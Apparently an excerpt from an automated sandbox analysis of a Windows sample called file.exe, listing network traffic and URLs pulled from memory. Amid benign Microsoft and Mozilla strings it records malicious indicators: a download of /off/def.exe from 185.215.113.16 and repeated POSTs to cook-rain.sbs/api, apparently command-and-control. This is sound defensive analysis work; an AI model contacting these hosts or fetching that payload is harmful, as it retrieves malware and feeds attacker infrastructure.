            Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
            Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
            Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
            Source: file.exe, 00000000.00000003.2550057868.0000000001714000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
            Source: file.exe, 00000000.00000003.2550057868.0000000001714000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exep
            Source: file.exe, 00000000.00000003.2550057868.0000000001714000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16:80/off/def.exe
            Source: file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
            Source: chromecache_108.7.drString found in binary or memory: http://schema.org/Organization
            Source: file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: file.exe, 00000000.00000003.2348283129.0000000005D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://aka.ms/certhelp
            Source: chromecache_108.7.dr, chromecache_72.7.dr, chromecache_109.7.drString found in binary or memory: https://aka.ms/feedback/report?space=61
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://aka.ms/msignite_docs_banner
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://aka.ms/pshelpmechoose
            Source: chromecache_108.7.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
            Source: chromecache_108.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
            Source: chromecache_108.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
            Source: file.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
            Source: file.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
            Source: file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://channel9.msdn.com/
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
            Source: file.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
            Source: file.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: file.exe, file.exe, 00000000.00000003.2549551797.0000000005CE2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2296160603.0000000001712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/
            Source: file.exe, 00000000.00000003.2378263723.0000000005CF2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2379238442.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2346707549.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2346895595.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2346875346.0000000005CF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2375572489.0000000005CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/(
            Source: file.exe, 00000000.00000003.2378263723.0000000005CF2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2379238442.0000000005CF5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2375572489.0000000005CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/4
            Source: file.exe, 00000000.00000003.2549551797.0000000005CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/A
            Source: file.exe, 00000000.00000003.2550057868.0000000001714000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2471408685.0000000001717000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2375572489.0000000005CF2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2431168580.0000000005CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api
            Source: file.exe, 00000000.00000003.2549551797.0000000005CE2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2431421805.0000000005CF2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2431168580.0000000005CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api3
            Source: file.exe, 00000000.00000003.2549551797.0000000005CE2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2431421805.0000000005CF2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2417433721.0000000005CF2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2431168580.0000000005CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiB
            Source: file.exe, 00000000.00000003.2408998298.0000000001715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api_time
            Source: file.exe, 00000000.00000003.2274130411.00000000016F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apixg3
            Source: file.exe, 00000000.00000003.2320204979.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2408998298.0000000001715000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2320812053.0000000005CF8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2320005020.0000000005CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/api
            Source: file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: chromecache_108.7.drString found in binary or memory: https://github.com/Thraka
            Source: chromecache_108.7.drString found in binary or memory: https://github.com/Youssef1313
            Source: chromecache_108.7.drString found in binary or memory: https://github.com/adegeo
            Source: chromecache_108.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
            Source: chromecache_108.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
            Source: chromecache_108.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
            Source: chromecache_108.7.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://github.com/dotnet/try
            Source: chromecache_108.7.drString found in binary or memory: https://github.com/gewarren
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://github.com/js-cookie/js-cookie
            Source: chromecache_108.7.drString found in binary or memory: https://github.com/mairaw
            Source: chromecache_108.7.drString found in binary or memory: https://github.com/nschonni
            Source: file.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
            Source: chromecache_108.7.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
            Source: chromecache_89.7.drString found in binary or memory: https://schema.org
            Source: file.exe, 00000000.00000003.2353956814.0000000005E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: file.exe, 00000000.00000003.2353956814.0000000005E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
            Source: chromecache_89.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
            Source: file.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
            Source: file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exe, 00000000.00000003.2297193301.0000000005D2D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297459265.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005D2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: chromecache_100.7.dr, chromecache_89.7.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
            Source: file.exe, 00000000.00000003.2353751272.0000000005D27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
            Source: file.exe, 00000000.00000003.2353751272.0000000005D27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: file.exe, 00000000.00000003.2353956814.0000000005E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
            Source: file.exe, 00000000.00000003.2353956814.0000000005E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
            Source: file.exe, 00000000.00000003.2353956814.0000000005E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.2375670727.0000000005D08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
            Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
